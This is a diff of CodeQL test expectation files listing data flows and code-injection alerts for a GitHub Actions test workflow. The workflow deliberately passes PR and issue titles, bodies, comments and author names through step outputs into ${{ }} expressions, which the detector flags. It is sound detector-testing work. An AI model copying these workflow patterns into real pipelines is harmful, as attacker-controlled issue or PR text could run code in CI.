.github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | 
.github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api 
/repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -487,6 +523,60 @@ nodes | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref 
[head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq 
'.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R 
${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -643,6 +733,24 @@ subpaths | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 15d526ca7b4d..6afef323ff01 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -160,6 +160,42 @@ edges | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} 
"$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api 